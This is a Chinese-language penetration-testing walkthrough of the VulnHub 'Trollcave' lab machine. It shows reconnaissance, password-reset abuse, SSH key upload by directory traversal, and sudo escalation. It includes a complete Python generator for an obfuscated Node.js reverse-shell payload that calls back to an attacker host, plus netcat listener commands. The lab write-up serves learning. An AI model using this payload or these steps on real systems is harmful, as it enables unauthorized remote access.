渗透测试之靶机试炼（八）

靶机简介

靶机地址：
https://download.vulnhub.com/trollcave/trollcave-v1-2.ova.torrent

运行环境：
VirtualBox

攻击测试机环境
kali
win 10

工具简介

nmap
dirb
python
nc

靶机网卡设置

三台虚拟主机在同一局域网即可
作者这里直接将靶机桥接到win 10 和kali虚拟机所在网段。

信息收集

nmap寻找目标ip
命令：nmap 10.211.55.0/24
常规访问80端口
存在登录和注册，但是注册功能关闭了，在登录窗口尝试了爆破，注入等，均未成功。我们使用dirb扫描一下目录
访问找到的url，都进行了跳转，需要登录
这里我们只能继续信息收集
发现主页一篇名为password reset的文章
这是一篇管理人员发布的文章 主要内容就是说添加了一个密码重置的方法,根据提示我们访问password_resets这里目录
并没有打开，这让我感到怀疑，没办法只好继续信息收集，过了好久，也没找到什么有用的，又回到这里，查询了许多资料才知道ruby的resetpassword,参考ruby on rails的教程
https://www.railstutorial.org/book/password_reset#sec-password_resets_resource
访问http://10.211.55.33/password_resets/new
尝试重置admin密码失败，有常识页面上给的账户xer，返回如下
访问给的url：http://10.211.55.33/password_resets/edit.qZrbU3WDeexVqjk9_uJjTw?name=xer
输入密码进行重置
我们发现一个文件管理功能
这里能上传文件，由于是ruby写的，所以不能上传木马，这里我们选择直接上传ssh公钥
首先本地生成ssh公钥
将其id_rsa.pub上传至/home/用户/.ssh/authorized_keys下
上传几次均失败，我们这里在Users选项内找到许多用户，我们将其能重置密码的都进行重置密码，登录查看，最后发现在King用户下多一个amdin panel 选项，其内容是文件上传的配置，我们进行配置
之后再进行上传，还是没有成功，最后继续查看其它文件，最后在home下看到一片文章
发现用户rails,经过测试，只有在rails用户下存在.ssh目录，意味着只有这个用户能够进行公钥登录，那么我们将公钥传至该用户的.ssh目录下/home/rails/.ssh/authorized_keys
这由于我们不知当前在哪个目录下，所以选择利用跨目录从根目录进行写入文件，上传成功后，我们进行登录（这里由于作者电脑问题，靶机ip变为10.211.55.35）
一圈

提权

获取到目标服务器shell，利用python获取交互式shell
命令：python -c ‘import pty; pty.spawn("/bin/bash")’
继续进行信息收集，在king用户目录下发现一个文件calc/calc.js
通过查看其源码，发现其有命令执行漏洞，这里我们在网上找了一个生成paylaod的脚本文件
#!/usr/bin/python
import sys

if len(sys.argv) != 3:
print "Usage: %s " % (sys.argv[0])
sys.exit(0)

IP_ADDR = sys.argv[1]
PORT = sys.argv[2]

def charencode(string):
“”“String.CharCode”""
encoded = ‘’
for char in string:
encoded = encoded + “,” + str(ord(char))
return encoded[1:]

print “[+] LHOST = %s” % (IP_ADDR)
print “[+] LPORT = %s” % (PORT)
NODEJS_REV_SHELL = ‘’’(function(){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? “cmd” : “/bin/sh”; var net = require(“net”), cp = require(“child_process”), util = require(“util”), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(%s, “%s”, function() { client.socket.pipe(sh.stdin); if (typeof util.pump === “undefined”) { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on(“error”, function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); })();1+1;’’’ % (PORT, IP_ADDR)
print “[+] Encoding”
PAYLOAD = charencode(NODEJS_REV_SHELL)
print “eval(String.fromCharCode(%s))” % (PAYLOAD)
带有参数 ip和port，运行结果如图
利用得到的shell和命令执行漏洞，执行payload
首先在攻击机上使用nc监听1234端口
命令：nc -lvp 1234
利用shell执行paylaod
获取到shell，权限为king
获取交互式shell，执行sudo -l 发现没有密码，可以直接使用sudo提权
执行 sudo bash
获取root权限

写这篇文章学到了好多知识。坚持就是胜利，加油。